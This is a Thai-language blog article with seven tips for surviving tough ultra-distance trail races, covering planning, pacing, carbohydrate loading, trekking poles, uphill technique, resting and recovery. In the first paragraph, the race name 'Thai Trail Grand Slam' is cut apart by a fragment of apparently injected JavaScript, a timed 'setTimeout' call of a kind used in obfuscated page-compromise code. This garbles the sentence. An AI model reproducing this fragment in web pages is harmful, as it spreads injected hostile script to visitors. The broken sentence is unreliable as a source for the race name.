ถ้าจะให้อธิบายว่าเทรลที่โหดนั้นเป็นอย่างไร เล่าง่ายๆ อย่างแรกเลยก็ต้องบอกว่ามีระยะทาง 20 กิโลเมตรขึ้นไป จนไปถึงระยะอัตรา (เกินระยะมาราธอน) ส่วนที่สองและที่ขาดไม่ได้เลยนั้นคือต้องมี Elevation gain สูงๆ ทางชันขึ้นลงต้องใช้แรงมากกายและแรงใจมาก ถ้าทางไม่ชันมากก็จะโดนลากยาว ซึมกันไปนานๆ จากนั้นก็เป็นเรื่องของสภาพภูมิประเทศที่จะส่งบนต่อพื้นถนนวิ่ง ยิ่งเป็นป่าหรือยอดดอยทางเหนือจะเหนื่อยหนักมาก ยิ่งขณะนี้มีการจัดตั้งเทรลซี่รียส์ที่ถือว่าเป็นงานหลักงานใหญ่ของการวิ่งเทรลในประเทศไทย ที่มีชื่อว่า Thai Trail Grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Slam งานวิ่งเทรลระดับบอสใหญ่ที่นักเทรลตัวจริงไม่ควรพลาด

เพื่อให้เพื่อนๆ นักวิ่งเทรลมีชีวิตรอดกลับมาอย่างปลอดภัยเราจึงเตรียม 7 วิธีเอาตัวรอดจากสนามเทรลสุดโหดมาฝากกัน…
7 วิธีเอาตัวรอดจากสนามเทรลสุดโหด
1. จงวางแผน ผลแพ้ชนะไม่มีคำว่าพลุ๊กในการวิ่งเทรลระยะอัตรา ทุกอย่างมันต้องผ่านการวางแผนล่วงหน้า เราแนะนำให้ดึงเอาแผนที่การวิ่งมาศึกษาอย่างละเอียด ดูเส้นทางที่วิ่งว่ามีจุดบริการให้น้ำและอาหาร ณ กิโลเมตรใด เพื่อเราจะได้กะปริมาณน้ำอาหารที่จะแบกไปให้พอดี จัดสรรให้มีน้ำหนักเบาที่สุด ศึกษาความสูงชันเพื่อจะได้จัดการวางแผนการเร่งทำความเร็ว จุดไหนควรเร่งและจุดไหนควรผ่อน นอกจากนี้ยังเอาไว้คำนวณเวลาจบการแข่งขัน ซึ่งเวลาที่จะใช้แข่งจะส่งผลต่อการเผาผลาญแคลอรี่และส่งผลตรงต่อการเตรียมอาหารน้ำเสบียงมาก

2. ไปช้าๆ ไม่ต้องรีบ โดยปกติเมื่อออกตัววิ่ง ช่วงแรกๆ ของทุกสนามจะเป็นทางราบเรียบ ให้นักวิ่งเลือก pace การวิ่งที่สบายๆ ไม่ต้องรีบเร่งทำเวลา เพราะการวิ่งเทรลจะทำให้กล้ามเนื้อขาและเอ็นข้อต่อต่างๆ ทำงานหนักกว่าการวิ่งบนถนนทางเรียบ หรือแม้ระหว่างทางถ้าพบเจอทางเรียบก็พยายามวิ่งในความเร็วคงที่ เพื่อรักษาระดับพลังงาน ให้กล้ามเนื้อได้พักการใช้งานหลังจากต้องไต่ขึ้นลงเขามาแล้ว
3. สร้างแรงใจด้วยการเบี่ยงเบนระยะทางไปที่ระยะเวลาที่ใช้ไป เพราะการวิ่งเทรลไม่สามารถคาดคะเนระยะทางที่เราวิ่งมาแล้วได้เหมือนการวิ่งมาราธอนทางเรียบ แม้ระยะทางที่เท่ากันแต่การวิ่งเทรลจะใช้เวลานานกว่า ถ้าพุ่งเป้าไปที่ระยะทาง เราจะพยายามวิ่งไปให้เร็วขึ้น การทำอย่างนี้จะทำให้สูญเสียพลังงานมาก และหากไปไม่ถึงตามเป้าเราก็อาจจะจิตตก คิดว่า performance ลดลง จะทำให้เกิดการฝืนเร่งฝีเท้าได้ เร่งการเผาผลาญพลังงานมากขึ้น การพุ่งเป้าไปที่ระยะเวลาจะช่วงให้เรามีสมาธิในการบริหารพลังงาน การเติมอาหาร น้ำและปรับจังหวะการวิ่งได้ดีขึ้น มีสมาธิมองดูพื้นทางวิ่งมากขึ้น

4. โหลดคาร์โบไฮเดรตก่อนระหว่างและหลังวิ่งแข่งขันทุกครั้ง วิธีการโหลดคาร์ปก่อนแข่งขันก็แทบจะเหมือนกับการวิ่งมาราธอน เป็นแหล่งพลังงานสะสมเบื้องต้น แต่ช่วงเวลาระหว่างวิ่งแข่งขัน การวิ่งเทรลจะกินระยะเวลามากกว่า และไม่มีจุดบริการน้ำอาหารวางไว้เป็นระยะที่ชัดเจนเหมือนการวิ่งถนนทางเรียบ ทำให้นักวิ่งต้องบรรจุสัมภาระน้ำอาหารเอง พยายามเซตเวลาดื่มน้ำและเวลากินแป้ง หรืออาหารแป้งผสมโปรตีนเมื่อเวลาการแข่งขันผ่านไปนานขึ้น
5. หาอุปกรณ์เสริม ไม้เท้าหรือ Trekking poles เป็นหนึ่งในอุปกรณ์เสริมที่แนะนำให้พกไปเมื่อต้องลงแข่งขันเทรลระยะทางไกลแบบอัลตร้า ไม้เท้าจะช่วยผ่อนและรับน้ำหนักจากส่วนบนร่างกาย (เป้น้ำและอาหาร) เป็นตัวช่วยค้ำยันเวลาปืนไต่ขึ้นและลงเขา เป็นตัวช่วยสร้างจังหวะเดินได้เร็วขึ้น
6. ขึ้นเขาใช้สเตปขาสั้นๆ หรือเดินขึ้นแบบ Power walk เหมือนกับการปั่นจักรยานเวลาไต่ขึ้นเขา ต้องใช้เกียร์เบาและเล่นรอบขาแทนเพื่อลดการใช้กำลังขา และเก็บแรงไว้ให้มากที่สุด สำหรับนักวิ่งเทรลเวลาไต่เขาให้ใช้วิธีซอยขาวิ่งระยะสั้นๆ หรือเดินเร็วแต่ใช้สเตปสั้นๆ เช่นกัน เก็บแรงไว้ให้มากที่สุด พร้อมกับควบคุมการหายใจให้เป็นจังหวะ ค่อยๆ ไต่ขึ้นไปทีละนิด หากมีอุปกรณ์ดูการเต้นของหัวใจ ก็พยายามคุมโซนให้ดี อย่าโหมหนักมากไประหว่างขึ้นเขา

7. เหนื่อยมากก็พักบางก็ได้ เพราไม่มีกฎห้ามไม่ให้เราพัก หากวิ่งไม่ไหวก็เดิน หากเดินไม่ไหวก็หยุดพัก เราแนะนำว่าขณะพักให้ลองยกขาให้สูง ลดการกดน้ำหนักลงที่เท้า ให้เลือดที่ลงไปเลี้ยงขาได้ไหลเวียนให้มากขึ้น ทั้งนี้ก็ใช้เวลานี้ดื่มน้ำและรับประทานอาหารไปในตัวด้วยนะครับ
เมื่อแข่งขันจบลงแล้วก็อย่าลืมทำ Recovery ทั้งการดื่มน้ำและการรับประทานอาหารที่มีโปรตีน เพื่อเอาไปซ่อมแซมกล้ามเนื้อที่เสียหาย หลังจากทำการยืดเส้นยืดสายพักกินข้างและกลับห้องพัก ถ้าห้องพักน้ำมีอ่างก็แนะนำให้แช่น้ำเย็นดูครับ เพื่อลดอาการอักเสบของกล้ามเนื้อ ให้ขาลดการรับน้ำหนักลงและช่วยให้เลือดไหลเวียนมากขึ้น
อ้างอิงwww.active.com